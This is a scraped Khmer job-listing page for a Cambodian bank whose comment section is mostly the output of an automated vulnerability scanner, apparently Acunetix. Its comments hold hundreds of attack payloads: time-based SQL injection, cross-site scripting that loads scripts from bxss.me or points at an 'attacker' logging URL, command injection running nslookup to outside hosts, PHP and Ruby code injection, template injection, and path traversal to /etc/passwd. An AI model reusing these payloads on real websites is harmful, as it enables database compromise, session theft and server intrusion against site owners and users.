ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

ធនាគារឯកទេស ខេប៊ី ដេហាន ម.ក
ធនាគារ KDSB គឺជាក្រុមហ៊ុនបណ្តាក់ទុនរួមគ្នារវាងក្រុមហ៊ុន KB Kookmin Card Co., Ltd និងធនាគារIndochina Bank។ ក្រុមហ៊ុន KB Kookmin Card គឺជាបុត្រសម្ព័ន្ធរបស់ក្រុមហ៊ុន KB Financial Group។ ធនាគារ Indochina Bank ធ្លាប់មានបទពិសោធន៍ជោគជ័យត្រចះត្រចង់នៅក្នុងការផ្ដល់ឥណទានសម្រាប់ទិញរថយន្ត(Auto Finance) នៅសាធារណរដ្ឋប្រជាធិបតេយ្យប្រជាមានិតឡាវ។ ដូចេ្នះហើយទើបធនាគារ KDSB អាចផ្ដល់សេវាកម្មយ៉ាង់ឆាប់រហ័សនិងមានភាពបត់បែនស្របតាមទីផ្សារឥណទានរបល់ប្រទេសកម្ពុជា ដើម្បីផ្តល់ជូននូវសង្គមហរិញ្ញវត្ថុដ៍ល្អប្រសើរមួយ។

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 65

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 46 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 09:50:00


  @@OBBlu


 • pHqghUme

  2021-05-06 09:49:55


  1'"


 • pHqghUme

  2021-05-06 09:49:54


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 09:49:39


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 09:49:24


  JIJNNY7J')) OR 614=(SELECT 614 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:49:04


  cCRpQthh') OR 73=(SELECT 73 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:48:39


  T4qzM5ZC' OR 12=(SELECT 12 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:48:17


  -1)) OR 894=(SELECT 894 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:47:56


  -5) OR 623=(SELECT 623 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:47:33


  -5 OR 527=(SELECT 527 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:47:20


  XYm3zFh7'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:47:04


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:46:50


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:46:36


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:46:20


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 09:45:59


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 09:45:41


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 09:45:26


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 09:45:04


  -1" OR 2+263-263-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:45:02


  -1' OR 2+821-821-1=0+0+0+1 or '04Jr5qXt'='


 • pHqghUme

  2021-05-06 09:45:01


  -1' OR 2+638-638-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:45:00


  -1 OR 2+481-481-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:45:00


  -1 OR 2+691-691-1=0+0+0+1


 • pHqghUme

  2021-05-06 09:44:59


  JZuJmMIr


 • pHqghUme

  2021-05-06 09:44:36


  1


 • pHqghUme

  2021-05-06 09:44:09


  1


 • @@pJOnd

  2021-05-06 09:43:47


  1


 • 1'"

  2021-05-06 09:43:42


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 09:43:41


  1


 • mq7k4rxB')) OR 796=(SELECT 796 FROM PG_SLEEP(15))--

  2021-05-06 09:43:20


  1


 • oT5evnvd') OR 735=(SELECT 735 FROM PG_SLEEP(15))--

  2021-05-06 09:42:57


  1


 • Cc0BXLiX' OR 878=(SELECT 878 FROM PG_SLEEP(15))--

  2021-05-06 09:42:37


  1


 • wPiHtfna'; waitfor delay '0:0:15' --

  2021-05-06 09:42:14


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 09:41:54


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 09:41:39


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 09:41:19


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 09:40:52


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 09:40:30


  1


 • -1' OR 2+441-441-1=0+0+0+1 or 'nR66Y4IT'='

  2021-05-06 09:40:07


  1


 • -1" OR 2+799-799-1=0+0+0+1 --

  2021-05-06 09:40:07


  1


 • -1' OR 2+654-654-1=0+0+0+1 --

  2021-05-06 09:40:05


  1


 • -1 OR 2+955-955-1=0+0+0+1

  2021-05-06 09:40:04


  1


 • -1 OR 2+445-445-1=0+0+0+1 --

  2021-05-06 09:40:03


  1


 • afXHYFDw

  2021-05-06 09:40:02


  1


 • pHqghUme

  2021-05-06 09:39:39


  1


 • pHqghUme

  2021-05-06 09:39:22


  1


 • pHqghUme

  2021-05-06 09:39:07


  1


 • pHqghUme

  2021-05-06 09:39:04


  1


 • pHqghUme

  2021-05-06 09:39:03


  1


 • pHqghUme

  2021-05-06 09:38:49


  1


 • pHqghUme

  2021-05-06 09:38:35


  1


 • pHqghUme

  2021-05-06 09:38:19


  1


 • pHqghUme

  2021-05-06 09:38:05


  1


 • pHqghUme

  2021-05-06 09:37:51


  1


 • pHqghUme

  2021-05-06 09:37:34


  1


 • pHqghUme

  2021-05-06 09:37:19


  1


 • pHqghUme

  2021-05-06 09:36:58


  1


 • pHqghUme

  2021-05-06 09:36:40


  1


 • pHqghUme

  2021-05-06 09:36:22


  1


 • pHqghUme

  2021-05-06 09:36:21


  1


 • pHqghUme

  2021-05-06 09:36:21


  1


 • pHqghUme

  2021-05-06 09:36:20


  1


 • pHqghUme

  2021-05-06 09:36:19


  1


 • pHqghUme

  2021-05-06 09:36:18


  1


 • pHqghUme

  2021-05-06 09:35:47


  1


 • pHqghUme

  2021-05-06 09:35:22


  1


 • pHqghUme

  2021-05-06 09:34:57


  1


 • pHqghUme

  2021-05-06 09:34:54


  1


 • pHqghUme

  2021-05-06 09:34:53


  1


 • pHqghUme

  2021-05-06 09:34:29


  1


 • pHqghUme

  2021-05-06 09:34:10


  1


 • pHqghUme

  2021-05-06 09:33:38


  1


 • pHqghUme

  2021-05-06 09:32:15


  1


 • pHqghUme

  2021-05-06 09:31:09


  1


 • pHqghUme

  2021-05-06 09:30:38


  1<BG11Pd<


 • pHqghUme

  2021-05-06 09:30:32


  1


 • pHqghUme

  2021-05-06 09:30:32


  1<img sRc='http://attacker-9072/log.php?


 • pHqghUme

  2021-05-06 09:30:27


  1<hiOwRz x=9413>


 • pHqghUme

  2021-05-06 09:30:22


  1<ifRAme sRc=9126.com></IfRamE>


 • pHqghUme

  2021-05-06 09:30:16


  1<WNJANQ>ZWNI3[!+!]</WNJANQ>


 • pHqghUme

  2021-05-06 09:30:15


  1


 • pHqghUme

  2021-05-06 09:30:10


  19vhPB <ScRiPt >BCcV(9311)</ScRiPt>


 • pHqghUme

  2021-05-06 09:30:04


  1<% contenteditable onresize=BCcV(9274)>


 • pHqghUme

  2021-05-06 09:29:57


  1}body{acu:Expre/**/SSion(BCcV(9169))}


 • pHqghUme

  2021-05-06 09:29:52


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 09:29:49


  1


 • pHqghUme

  2021-05-06 09:29:45


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 09:29:36


  1<input autofocus onfocus=BCcV(9987)>


 • pHqghUme

  2021-05-06 09:29:28


  1&lt;ScRiPt&gt;BCcV(9057)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 09:29:26


  1


 • pHqghUme

  2021-05-06 09:29:22


  1\u003CScRiPt\BCcV(9346)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 09:29:16


  %31%3C%53%63%52%69%50%74%20%3E%42%43%63%56%289404%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 09:29:09


  1<img/src=">" onerror=alert(9930)>


 • pHqghUme

  2021-05-06 09:29:02


  1


 • pHqghUme

  2021-05-06 09:29:02


  1<img src=xyz OnErRor=BCcV(9963)>


 • pHqghUme

  2021-05-06 09:29:01


  1


 • pHqghUme

  2021-05-06 09:29:00


  1


 • pHqghUme

  2021-05-06 09:29:00


  1


 • pHqghUme

  2021-05-06 09:28:59


  1


 • pHqghUme

  2021-05-06 09:28:58


  1


 • pHqghUme

  2021-05-06 09:28:52


  1<img src=//xss.bxss.me/t/dot.gif onload=BCcV(9757)>


 • pHqghUme

  2021-05-06 09:28:44


  1<body onload=BCcV(9328)>


 • pHqghUme

  2021-05-06 09:28:39


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9989'>


 • pHqghUme

  2021-05-06 09:28:35


  1


 • pHqghUme

  2021-05-06 09:28:32


  1<isindex type=image src=1 onerror=BCcV(9370)>


 • pHqghUme

  2021-05-06 09:28:23


  1<ScRiPt >BCcV(9504)</ScRiPt>


 • pHqghUme

  2021-05-06 09:28:17


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9718></ScRiPt>


 • pHqghUme

  2021-05-06 09:28:15


  1


 • pHqghUme

  2021-05-06 09:28:09


  1<ScRiPt >BCcV(9468)</ScRiPt>


 • pHqghUme

  2021-05-06 09:27:58


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%42%43%63%56%28%39%39%34%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 09:27:44


  1<script>BCcV(9599)</script>


 • pHqghUme

  2021-05-06 09:27:34


  1<WR5MQD>YW91U[!+!]</WR5MQD>


 • pHqghUme

  2021-05-06 09:27:22


  1<ScRiPt >BCcV(9073)</ScRiPt>


 • pHqghUme

  2021-05-06 09:27:15


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 09:27:09


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 09:27:04


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 09:26:58


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 09:26:54


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:26:48


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 09:26:41


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:26:27


  acux4290%C0%BEz1%C0%BCz2a%90bcxuca4290


 • pHqghUme

  2021-05-06 09:26:19


  acu4362%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4362


 • pHqghUme

  2021-05-06 09:26:08


  19646909


 • pHqghUme

  2021-05-06 09:26:01


  '"()&%<acx><ScRiPt >BCcV(9235)</ScRiPt>


 • pHqghUme

  2021-05-06 09:25:56


  1'"()&%<acx><ScRiPt >BCcV(9122)</ScRiPt>


 • pHqghUme<BiHpvT<

  2021-05-06 09:25:42


  1


 • pHqghUme<img sRc='http://attacker-9146/log.php?

  2021-05-06 09:25:29


  1


 • pHqghUme<yZtxbP x=9303>

  2021-05-06 09:25:25


  1


 • pHqghUme<ifRAme sRc=9070.com></IfRamE>

  2021-05-06 09:25:19


  1


 • pHqghUme<WSEIM5>C9XLR[!+!]</WSEIM5>

  2021-05-06 09:25:10


  1


 • pHqghUme8z4Ax <ScRiPt >BCcV(9607)</ScRiPt>

  2021-05-06 09:25:01


  1


 • pHqghUme<% contenteditable onresize=BCcV(9844)>

  2021-05-06 09:24:54


  1


 • pHqghUme}body{acu:Expre/**/SSion(BCcV(9887))}

  2021-05-06 09:24:46


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 09:24:39


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 09:24:29


  1


 • pHqghUme<input autofocus onfocus=BCcV(9913)>

  2021-05-06 09:24:21


  1


 • pHqghUme&lt;ScRiPt&gt;BCcV(9193)&lt;/sCripT&gt;

  2021-05-06 09:24:11


  1


 • pHqghUme\u003CScRiPt\BCcV(9163)\u003C/sCripT\u003E

  2021-05-06 09:24:05


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%42%43%63%56%289736%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 09:23:59


  1


 • pHqghUme<img/src=">" onerror=alert(9503)>

  2021-05-06 09:23:55


  1


 • pHqghUme

  2021-05-06 09:23:51


  1


 • pHqghUme<img src=xyz OnErRor=BCcV(9117)>

  2021-05-06 09:23:50


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=BCcV(9509)>

  2021-05-06 09:23:45


  1


 • pHqghUme<body onload=BCcV(9809)>

  2021-05-06 09:23:39


  1


 • pHqghUme

  2021-05-06 09:23:36


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9046'>

  2021-05-06 09:23:33


  1


 • pHqghUme<isindex type=image src=1 onerror=BCcV(9130)>

  2021-05-06 09:23:23


  1


 • pHqghUme<ScRiPt >BCcV(9424)</ScRiPt>

  2021-05-06 09:23:15


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9307></ScRiPt>

  2021-05-06 09:23:07


  1


 • pHqghUme<ScRiPt >BCcV(9244)</ScRiPt>

  2021-05-06 09:23:00


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%42%43%63%56%28%39%39%31%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 09:22:53


  1


 • pHqghUme<script>BCcV(9011)</script>

  2021-05-06 09:22:47


  1


 • pHqghUme<WC6XOO>842UY[!+!]</WC6XOO>

  2021-05-06 09:22:38


  1


 • pHqghUme<ScRiPt >BCcV(9024)</ScRiPt>

  2021-05-06 09:22:29


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 09:22:18


  1


 • acx__${98991*97996}__::.x

  2021-05-06 09:22:10


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 09:22:03


  1


 • acx{{98991*97996}}xca

  2021-05-06 09:21:53


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 09:21:46


  1


 • <th:t="${acx}#foreach

  2021-05-06 09:21:39


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 09:21:32


  1


 • acux4620%C0%BEz1%C0%BCz2a%90bcxuca4620

  2021-05-06 09:21:27


  1


 • acu3400%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3400

  2021-05-06 09:21:17


  1


 • pHqghUme9760641

  2021-05-06 09:21:06


  1


 • '"()&%<acx><ScRiPt >BCcV(9288)</ScRiPt>

  2021-05-06 09:20:55


  1


 • pHqghUme'"()&%<acx><ScRiPt >BCcV(9183)</ScRiPt>

  2021-05-06 09:20:44


  1


 • pHqghUme

  2021-05-06 09:20:35


  1


 • pHqghUme

  2021-05-06 09:20:29


  1


 • pHqghUme

  2021-05-06 09:20:19


  1


 • pHqghUme

  2021-05-06 09:20:13


  `(nslookup hitwiwlpdrjpmf2dfa.bxss.me||perl -e "gethostbyname('hitwiwlpdrjpmf2dfa.bxss.me')")`


 • pHqghUme

  2021-05-06 09:20:13


  1


 • pHqghUme

  2021-05-06 09:20:12


  |(nslookup hitewuaasnhkp8c266.bxss.me||perl -e "gethostbyname('hitewuaasnhkp8c266.bxss.me')")


 • pHqghUme

  2021-05-06 09:20:12


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 09:20:11


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 09:20:10


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 09:20:09


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 09:20:08


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 09:20:07


  $(nslookup hitivdxbikmij8a9a4.bxss.me||perl -e "gethostbyname('hitivdxbikmij8a9a4.bxss.me')")


 • pHqghUme

  2021-05-06 09:20:07


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • '.print(md5(31337)).'

  2021-05-06 09:20:06


  1


 • pHqghUme

  2021-05-06 09:20:06


  1


 • pHqghUme

  2021-05-06 09:20:05


  (nslookup hiteiepbqhsnt1986d.bxss.me||perl -e "gethostbyname('hiteiepbqhsnt1986d.bxss.me')")


 • ${@print(md5(31337))}\

  2021-05-06 09:20:03


  1


 • pHqghUme

  2021-05-06 09:20:03


  |echo ecrrwp$()\ iyocsr\nz^xyu||a #' |echo ecrrwp$()\ iyocsr\nz^xyu||a #|" |echo ecrrwp$()\ iyocsr\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:20:02


  &echo fozwfk$()\ uqpwdd\nz^xyu||a #' &echo fozwfk$()\ uqpwdd\nz^xyu||a #|" &echo fozwfk$()\ uqpwdd\nz^xyu||a #


 • ${@print(md5(31337))}

  2021-05-06 09:20:01


  1


 • ";print(md5(31337));$a="

  2021-05-06 09:20:00


  1


 • pHqghUme

  2021-05-06 09:20:00


  echo vcszxa$()\ hkvlit\nz^xyu||a #' &echo vcszxa$()\ hkvlit\nz^xyu||a #|" &echo vcszxa$()\ hkvlit\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:19:58


  1


 • `(nslookup hitfgytyhcwxda8b8b.bxss.me||perl -e "gethostbyname('hitfgytyhcwxda8b8b.bxss.me')")`

  2021-05-06 09:19:57


  1


 • ';print(md5(31337));$a='

  2021-05-06 09:19:57


  1


 • |(nslookup hitimhuodoxdwdf5ab.bxss.me||perl -e "gethostbyname('hitimhuodoxdwdf5ab.bxss.me')")

  2021-05-06 09:19:55


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 09:19:55


  1


 • pHqghUme

  2021-05-06 09:19:54


  1


 • pHqghUme

  2021-05-06 09:19:53


  <!--


 • pHqghUme

  2021-05-06 09:19:53


  1


 • pHqghUme

  2021-05-06 09:19:51


  1


 • pHqghUme

  2021-05-06 09:19:51


  '"


 • $(nslookup hitvnjkkseduz169e7.bxss.me||perl -e "gethostbyname('hitvnjkkseduz169e7.bxss.me')")

  2021-05-06 09:19:49


  1


 • <!--

  2021-05-06 09:19:49


  1


 • pHqghUme

  2021-05-06 09:19:49


  1


 • pHqghUme

  2021-05-06 09:19:49


  1&n922315=v920331


 • '"

  2021-05-06 09:19:48


  1


 • pHqghUme

  2021-05-06 09:19:48


  1


 • pHqghUme

  2021-05-06 09:19:47


  1


 • (nslookup hitsqyohfiyayb0075.bxss.me||perl -e "gethostbyname('hitsqyohfiyayb0075.bxss.me')")

  2021-05-06 09:19:47


  1


 • pHqghUme

  2021-05-06 09:19:46


  1


 • |echo dvnlve$()\ uoedkm\nz^xyu||a #' |echo dvnlve$()\ uoedkm\nz^xyu||a #|" |echo dvnlve$()\ uoedkm\nz^xyu||a #

  2021-05-06 09:19:46


  1


 • &echo rtucgs$()\ cwhpjw\nz^xyu||a #' &echo rtucgs$()\ cwhpjw\nz^xyu||a #|" &echo rtucgs$()\ cwhpjw\nz^xyu||a #

  2021-05-06 09:19:45


  1


 • pHqghUme

  2021-05-06 09:19:45


  1


 • pHqghUme

  2021-05-06 09:19:45


  '+'A'.concat(70-3).concat(22*4).concat(112).concat(75).concat(106).concat(75)+(require'socket' Socket.gethostbyname('hittc'+'ttlcyxnz75d13.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 09:19:44


  1


 • pHqghUme

  2021-05-06 09:19:44


  1


 • pHqghUme

  2021-05-06 09:19:44


  bxss.me


 • pHqghUme

  2021-05-06 09:19:43


  1


 • pHqghUme

  2021-05-06 09:19:43


  http://bxss.me/t/fit.txt%3F.jpg


 • echo sxijpq$()\ hcymwe\nz^xyu||a #' &echo sxijpq$()\ hcymwe\nz^xyu||a #|" &echo sxijpq$()\ hcymwe\nz^xyu||a #

  2021-05-06 09:19:43


  1


 • pHqghUme

  2021-05-06 09:19:43


  "+"A".concat(70-3).concat(22*4).concat(114).concat(67).concat(115).concat(79)+(require"socket" Socket.gethostbyname("hityw"+"ttzodpndd1668.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 09:19:42


  Http://bxss.me/t/fit.txt


 • '+'A'.concat(70-3).concat(22*4).concat(110).concat(71).concat(110).concat(82)+(require'socket' Socket.gethostbyname('hitex'+'mjkwtifa31935.bxss.me.')[3].to_s)+'

  2021-05-06 09:19:42


  1


 • pHqghUme

  2021-05-06 09:19:42


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 09:19:42


  1


 • "+"A".concat(70-3).concat(22*4).concat(97).concat(77).concat(97).concat(76)+(require"socket" Socket.gethostbyname("hitdb"+"rpfkgsov00d05.bxss.me.")[3].to_s)+"

  2021-05-06 09:19:41


  1


 • pHqghUme

  2021-05-06 09:19:41


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 09:19:41


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 09:19:41


  1


 • /xfs.bxss.me

  2021-05-06 09:19:41


  1


 • pHqghUme

  2021-05-06 09:19:41


  1


 • pHqghUme

  2021-05-06 09:19:39


  1


 • pHqghUme

  2021-05-06 09:19:39


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • pHqghUme

  2021-05-06 09:19:39


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 09:19:39


  1


 • pHqghUme

  2021-05-06 09:19:39


  1


 • pHqghUme

  2021-05-06 09:19:39


  1


 • bxss.me

  2021-05-06 09:19:38


  1


 • pHqghUme

  2021-05-06 09:19:38


  1


 • pHqghUme

  2021-05-06 09:19:38


  1


 • pHqghUme

  2021-05-06 09:19:38


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 09:19:38


  1


 • pHqghUme

  2021-05-06 09:19:38


  1


 • pHqghUme

  2021-05-06 09:19:36


  1


 • pHqghUme

  2021-05-06 09:19:36


  HttP://bxss.me/t/xss.html?%00


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 09:19:36


  1


 • pHqghUme

  2021-05-06 09:19:36


  1


 • pHqghUme

  2021-05-06 09:19:36


  1


 • pHqghUme&n969002=v997151

  2021-05-06 09:19:35


  1


 • pHqghUme

  2021-05-06 09:19:34


  ^(#$!@#$)(()))******


 • bxss.me/t/xss.html?%00

  2021-05-06 09:19:34


  1


 • pHqghUme

  2021-05-06 09:19:34


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 09:19:32


  1


 • pHqghUme

  2021-05-06 09:19:31


  !(()&&!|*|*|


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 09:19:31


  1


 • pHqghUme

  2021-05-06 09:19:31


  '"()


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 09:19:31


  1


 • pHqghUme

  2021-05-06 09:19:30


  )


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 09:19:30


  1


 • pHqghUme

  2021-05-06 09:19:30


  1


 • pHqghUme

  2021-05-06 09:19:30


  1


 • pHqghUme

  2021-05-06 09:19:30


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 09:19:29


  1


 • pHqghUme

  2021-05-06 09:19:29


  1


 • pHqghUme

  2021-05-06 09:19:28


  1


 • ^(#$!@#$)(()))******

  2021-05-06 09:19:28


  1


 • pHqghUme

  2021-05-06 09:19:28


  1


 • !(()&&!|*|*|

  2021-05-06 09:19:27


  1


 • pHqghUme

  2021-05-06 09:19:27


  ".gethostbyname(lc("hityn"."dpuuijwy08ad6.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(68).chr(113).chr(81)."


 • pHqghUme

  2021-05-06 09:19:27


  1


 • pHqghUme

  2021-05-06 09:19:27


  1


 • pHqghUme

  2021-05-06 09:19:26


  1


 • pHqghUme

  2021-05-06 09:19:26


  1


 • pHqghUme

  2021-05-06 09:19:26


  1


 • '"()

  2021-05-06 09:19:26


  1


 • )

  2021-05-06 09:19:25


  1


 • pHqghUme

  2021-05-06 09:19:25


  '.gethostbyname(lc('hitej'.'bfffbgryc2a35.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(87).chr(97).chr(85).'


 • ".gethostbyname(lc("hitqx"."hnimwaso644b5.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(68).chr(115).chr(79)."

  2021-05-06 09:19:24


  1


 • pHqghUme

  2021-05-06 09:19:24


  1


 • pHqghUme

  2021-05-06 09:19:24


  1


 • pHqghUme

  2021-05-06 09:19:24


  1


 • pHqghUme

  2021-05-06 09:19:22


  1


 • pHqghUme

  2021-05-06 09:19:22


  1


 • '.gethostbyname(lc('hitsg'.'ytxihmbp64e2f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(82).chr(115).chr(81).'

  2021-05-06 09:19:22


  1


 • pHqghUme

  2021-05-06 09:19:22


  1


 • pHqghUme

  2021-05-06 09:19:22


  1


 • pHqghUme

  2021-05-06 09:19:21


  1


 • pHqghUme

  2021-05-06 09:19:21


  1


 • pHqghUme

  2021-05-06 09:19:21


  1


 • pHqghUme

  2021-05-06 09:19:20


  1


 • pHqghUme

  2021-05-06 09:19:19


  1


 • pHqghUme

  2021-05-06 09:19:19


  ../1


 • pHqghUme

  2021-05-06 09:19:19


  1


 • pHqghUme

  2021-05-06 09:19:19


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 09:19:19


  1


 • pHqghUme

  2021-05-06 09:19:18


  1


 • pHqghUme

  2021-05-06 09:19:18


  1


 • pHqghUme

  2021-05-06 09:19:18


  1


 • pHqghUme

  2021-05-06 09:19:18


  1


 • pHqghUme

  2021-05-06 09:19:17


  1


 • pHqghUme

  2021-05-06 09:19:17


  1


 • pHqghUme

  2021-05-06 09:19:17


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 09:19:17


  1


 • pHqghUme

  2021-05-06 09:19:16


  1


 • pHqghUme

  2021-05-06 09:19:16


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 09:19:15


  1


 • ../pHqghUme

  2021-05-06 09:19:15


  1


 • pHqghUme

  2021-05-06 09:19:12


  1


 • pHqghUme

  2021-05-06 09:19:12


  1


 • pHqghUme

  2021-05-06 09:19:09


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 09:19:08


  1


 • pHqghUme

  2021-05-06 09:19:07


  1


 • pHqghUme

  2021-05-06 09:19:07


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 09:19:07


  1


 • pHqghUme

  2021-05-06 09:19:05


  1


 • pHqghUme

  2021-05-06 09:19:05


  1


 • pHqghUme

  2021-05-06 09:19:04


  1


 • pHqghUme

  2021-05-06 09:19:04


  1


 • blExSTFnWmY=

  2021-05-06 09:19:04


  1


 • pHqghUme

  2021-05-06 09:19:03


  1


 • pHqghUme

  2021-05-06 09:19:03


  1


 • pHqghUme

  2021-05-06 09:19:03


  1


 • pHqghUme

  2021-05-06 09:19:01


  1


 • pHqghUme

  2021-05-06 09:19:01


  1


 • pHqghUme

  2021-05-06 09:19:01


  ${9999264+9999354}


 • pHqghUme

  2021-05-06 09:18:59


  1


 • ${9999989+10000091}

  2021-05-06 09:18:59


  1


 • pHqghUme

  2021-05-06 09:18:59


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 09:18:58


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 09:18:58


  1


 • pHqghUme

  2021-05-06 09:18:57


  1


 • pHqghUme

  2021-05-06 09:18:57


  1


 • pHqghUme

  2021-05-06 09:18:57


  1


 • pHqghUme

  2021-05-06 09:18:57


  "+response.write(9948124*9979308)+"


 • pHqghUme

  2021-05-06 09:18:56


  1


 • pHqghUme

  2021-05-06 09:18:56


  1


 • pHqghUme

  2021-05-06 09:18:56


  1


 • pHqghUme

  2021-05-06 09:18:56


  '+response.write(9948124*9979308)+'


 • pHqghUme

  2021-05-06 09:18:55


  response.write(9948124*9979308)


 • "+response.write(9090330*9879645)+"

  2021-05-06 09:18:53


  1


 • pHqghUme

  2021-05-06 09:18:53

